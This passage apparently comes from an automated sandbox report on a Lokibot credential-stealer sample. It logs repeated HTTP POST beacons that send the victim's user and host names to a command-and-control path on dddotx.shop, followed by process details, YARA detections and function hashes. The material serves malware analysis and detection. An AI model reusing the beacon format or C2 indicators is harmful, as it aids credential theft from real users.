Sep 25, 2024 15:30:32.891236067 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLGSQL5A8e8gHtquLdZ7r%2Fv2r6h4w%2BMqBDqSXvsCPi4FkDYzRWCgCyG2XeHXeQ%2Bf923k4v%2F9hTXlLfrJlCZ4B5nH01E%2BL1b8UEW1q70RmHyCkz3LqrwSrfaOW73Q5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e919b83c341-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	55999	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:33.250965118 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:33.256021976 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:33.916858912 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZg7h6ySacjJ75kQbxcFnVBDLTVkZdsvr0qlI4GzH%2BBVBFyv1wrh9LCUgVjpwUEjyL9ByW1WnJhb0fhRYG2VvCrrAjXvcm%2B3P4j0q0Xgl%2Fg4tznO%2BpKYlT%2F6UTBwXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e983b980ca0-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	56000	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:34.068444014 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:34.073487997 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:35.635847092 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e9d9d415e82-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 15:30:35.637883902 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e9d9d415e82-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 15:30:35.638684988 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e9d9d415e82-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	56001	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:35.796345949 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:35.801198006 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:36.512485981 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Wc9BoQ2cdOOUz9pULeesDopHaLV2YsoAss%2BRpNsV9XeGVgAZszBw9X4envSXhECfsr9Clm5p4LzfDXdaB6UHvAiFvfB6ahf1EB92EHDQ%2FkzLDjxAuYRN6j7p67%2F6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ea84db18c15-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	56002	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:37.765178919 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:37.771542072 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:38.532172918 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hpkspz6Y7C9CA5kg8Ib7X1Dl4El6GK1wiB6QUyMxjiOkWktD%2FdbmTLnYGMa0EA9fRx5Go8WqBZA5sE0xWBk97H9PqekxhWo8bfE%2F8SmEWFN8oe3EC7%2B2K6e4riM%2FHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5eb48d1119db-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	56003	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:38.703809977 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:38.713861942 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:39.444228888 CEST	577	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wLxYX05jqFpNoYU2cVY48f%2FkC1uY7%2B4l03%2FLR6M0HLtrJYCqSvwE6VR%2FDQZSapg5W01P6lhDJcScE996oUNCiWHKwfdHcsv9WzisfE%2BRtN%2FS4JBVP%2BXxT%2BW6EgRwg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5eba7cbf438c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	56004	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:39.589740038 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:39.594556093 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:40.283212900 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0SdfyeaGArd9vXPBT1vRE92Sn%2F6Abpe9kDzekg14vuiOsKKX2pRbyg5kch1SYBfEWwFMXzHOI2VUOXNRVpuFLSIyYpctWsDFCffpweFs5ORAiQGZwhx36AR0%2BHLXpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ec019be4245-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	56005	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:40.427402973 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:40.433960915 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:41.170823097 CEST	575	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrIaHGUajYRIJBQ2y70HstN%2FXK%2FIN%2B%2BQGicIrj0G4bEVdjzgi1KHWwJ%2Fk%2Fa8B5BmsOJ956q8lqClQd9U17Y3aQYhB5fpjK7CukqeTBsooVtO73aGrLWdg0pfu9s%2Bcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ec56fad7c84-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	56006	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:41.407851934 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:41.413983107 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:42.063430071 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2BzWaR9gQE3MUuopuuXliGTqRJyCSnKgjIvsS80CdUvWqGRVmKjEisT8jh4Ea75KWLDpxxcPgkzdU8P7zGk1%2BkIc3V6zA94X75L0DqL%2B0RYmqTHsK7TKXrFFQcyEGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ecb5df14386-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	09:28:34
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\1e#U0414.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1e#U0414.exe"
Imagebase:	0xfd0000
File size:	168'448 bytes
MD5 hash:	ED9FE2C20A68172921C064D0D9886B7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:28:34
Start date:	25/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x250000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:28:34
Start date:	25/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x9c0000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	17
Total number of Limit Nodes:	2

Executed Functions

Function 03220A98 Relevance: 1.8, Strings: 1, Instructions: 523COMMON

Download Yara Rule

Strings

poq, xrefs: 03220EBF

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID: poq
API String ID: 0-1570044193
Opcode ID: 00d2513e7b8060e3434bb6b3aa54349a4fc3b7e861b0c23460217837bba71bb1
Instruction ID: fa3cbf5b2664d610603a94c6bebb81f0d3798ddaf062ceb8f0b56a4db28fc898
Opcode Fuzzy Hash: 00d2513e7b8060e3434bb6b3aa54349a4fc3b7e861b0c23460217837bba71bb1
Instruction Fuzzy Hash: D432C175A00228DFDB25CF69C944F99BBB2FF49300F1580E9E509AB265DB31AE91CF50

Function 032227C0 Relevance: 1.8, Strings: 1, Instructions: 508COMMON

Download Yara Rule

Strings

XXkq, xrefs: 032228B1

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID: XXkq
API String ID: 0-3965285535
Opcode ID: 44c3783806403c6511ae0d46b129ca9b7355f5348c639fdcb1db8c1a8ccfa8e3
Instruction ID: 5569e8bbee8907338578495c8510919d8d5de2e5411f289ecc534736a3c436db
Opcode Fuzzy Hash: 44c3783806403c6511ae0d46b129ca9b7355f5348c639fdcb1db8c1a8ccfa8e3
Instruction Fuzzy Hash: 5132B374E00229DFEB64CF69DD44B9DBBB2BB88300F1491AAE909A7354DB345E91CF50

Function 0322515A Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48bf6293d6240fc41c3f92d79b711da124b5ca971a8791cc7d9a096a49c8ffc8
Instruction ID: 40edc02053b55501d58bb365ece1dd900cfd97be242bfddea309346c2007de70
Opcode Fuzzy Hash: 48bf6293d6240fc41c3f92d79b711da124b5ca971a8791cc7d9a096a49c8ffc8
Instruction Fuzzy Hash: A1713971E156298BDB68CF2ACD457DAFBF2AF89300F14C0EA810DA7254EB705E958F40

Function 03220A87 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f550d0d21ca4151257ebb57d14b620e7585d89ce9ce4473687819cebb2a19e63
Instruction ID: 3fe8ad66acfbb332e134aa8a784a6cbc76c39a9d27eec1a1ccef4ab47a0da073
Opcode Fuzzy Hash: f550d0d21ca4151257ebb57d14b620e7585d89ce9ce4473687819cebb2a19e63
Instruction Fuzzy Hash: C651D875E152299FDB24CF6AD940BDEBBF2BF89300F14C1AAD508AB264D7305A85CF50

Function 0322536B Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5ee686963fbf65553bcf4b63e74e4126ce574bed307fe5b1a9b5e23ed39e4dc
Instruction ID: 09686b7fb2572711c811d4effea521bdf78385b0b93355fef9e67318aaad3ef7
Opcode Fuzzy Hash: c5ee686963fbf65553bcf4b63e74e4126ce574bed307fe5b1a9b5e23ed39e4dc
Instruction Fuzzy Hash: 1D511A74E156298BCB68CF25CE456D9FBF2AF89300F2085EA810DA7264DB705F918F40

Function 032253A9 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0d49aa2dc35578b91b70fbf0edb7cb2e58d661f8f6842510b8b0d13e2f7416
Instruction ID: 5d4749d79d9b46ff769348557cf18845683decd02d5169a1e6bd1261aa7e9fb3
Opcode Fuzzy Hash: 8d0d49aa2dc35578b91b70fbf0edb7cb2e58d661f8f6842510b8b0d13e2f7416
Instruction Fuzzy Hash: F5413B74E156298BCB68CF25CD856C9FBF2EF89300F2085EA810DA7254DB709ED18F40

Function 032267A7 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

NH>, xrefs: 032268E9

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID: NH>
API String ID: 0-2295643262
Opcode ID: 5879c1be0a748535db1a036ed93b1caec76b2f0ce241eea9bf9125716c87478c
Instruction ID: 581ce25faa83d75c96a38bf05f10629fe5b5124fefe236cef69a5409cc73a947
Opcode Fuzzy Hash: 5879c1be0a748535db1a036ed93b1caec76b2f0ce241eea9bf9125716c87478c
Instruction Fuzzy Hash: 04A11571C042699FCB25CF68C881BEDBBB1EF0A300F0485DAD588B7211D774AA85CF95

Function 0322689E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03226A87

Strings

NH>, xrefs: 032268E9

Memory Dump Source

